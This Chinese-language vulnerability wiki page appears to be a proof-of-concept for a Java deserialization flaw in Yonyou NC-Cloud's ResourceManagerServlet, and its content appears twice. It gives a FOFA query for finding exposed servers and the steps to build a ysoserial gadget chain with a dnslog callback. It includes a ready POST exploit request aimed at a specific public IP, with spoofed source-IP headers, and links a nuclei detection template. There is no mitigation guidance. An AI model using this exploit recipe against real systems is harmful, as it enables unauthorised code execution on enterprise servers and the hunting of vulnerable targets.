fofamini-wiki

登录白背景

源码

用友NC-Cloud uap-framework-rc-controller存在反序列化漏洞

一、漏洞简介

用友NC Cloud是用友推出的大型企业数字化平台。用友NC-Cloud uap-framework-rc-controller存在反序列化漏洞

二、影响版本

用友NC-Cloud

三、资产测绘

fofaapp="用友-NC-Cloud"
登录页面

四、漏洞复现

使用yakit生成dnslog域名

krdzg4.dnslog.cn

使用yso生成利用链

将上一步生成的hex数据替换payload字段，探测是否存在漏洞

POST /servlet/~uapss/uap.framework.rc.controller.ResourceManagerServlet HTTP/1.1
Host: 106.53.230.252:8081
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 335
Accept-Encoding: gzip, deflate
Connection: close
SL-CE-SUID: 126
X-Forwarded-For: 127.0.0.10
X-Originating-IP: 127.0.0.10
X-Remote-Addr: 127.0.0.10
X-Remote-IP: 127.0.0.10

{{hexd(payload)}}

若dnslog收到回显表示存在漏洞

nuclei脚本
用友-nc-cloud-ResourceManagerServlet-反序列化.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/okfszpg29qnqh5nf

# 用友NC-Cloud uap-framework-rc-controller存在反序列化漏洞

# 一、漏洞简介
用友NC Cloud是用友推出的大型企业数字化平台。用友NC-Cloud uap-framework-rc-controller存在反序列化漏洞

# 二、影响版本

- 用友NC-Cloud

# 三、资产测绘

- fofa`app="用友-NC-Cloud"`
- 登录页面

![image.png](./img/RcWhNoCpRtUdQS7R/1693575676700-0c5fed77-e3d1-4473-97a7-bfb8e7ae0bc1-401005.png)

## 四、漏洞复现

1. 使用yakit生成dnslog域名

![image.png](./img/RcWhNoCpRtUdQS7R/1703398864431-72492a5c-d69f-4b48-919b-5d884a4a381e-670241.png)
```java
krdzg4.dnslog.cn
```

2. 使用yso生成利用链

![image.png](./img/RcWhNoCpRtUdQS7R/1703398897922-097ac1df-56e0-4b64-80a3-873ae8717aa7-944913.png)

3. 将上一步生成的hex数据替换payload字段，探测是否存在漏洞
```java
POST /servlet/~uapss/uap.framework.rc.controller.ResourceManagerServlet HTTP/1.1
Host: 106.53.230.252:8081
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 335
Accept-Encoding: gzip, deflate
Connection: close
SL-CE-SUID: 126
X-Forwarded-For: 127.0.0.10
X-Originating-IP: 127.0.0.10
X-Remote-Addr: 127.0.0.10
X-Remote-IP: 127.0.0.10

{{hexd(payload)}}
```
![image.png](./img/RcWhNoCpRtUdQS7R/1703398973262-180f6e1a-b993-4afa-aed4-eff8908748f7-675277.png)

4. 若dnslog收到回显表示存在漏洞

![image.png](./img/RcWhNoCpRtUdQS7R/1703398994710-447f6e57-3009-4356-aa63-ba83b94ce206-996393.png)
nuclei脚本
[用友-nc-cloud-ResourceManagerServlet-反序列化.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709219610993-3e0a8b8b-e3cf-487d-bc4c-3970d51d3504.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F1622799%2F1709219610993-3e0a8b8b-e3cf-487d-bc4c-3970d51d3504.yaml%22%2C%22name%22%3A%22%E7%94%A8%E5%8F%8B-nc-cloud-ResourceManagerServlet-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96.yaml%22%2C%22size%22%3A899%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22u894281d7-92e9-422b-a85f-7d3848763dc%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22udf37ef8f%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/okfszpg29qnqh5nf>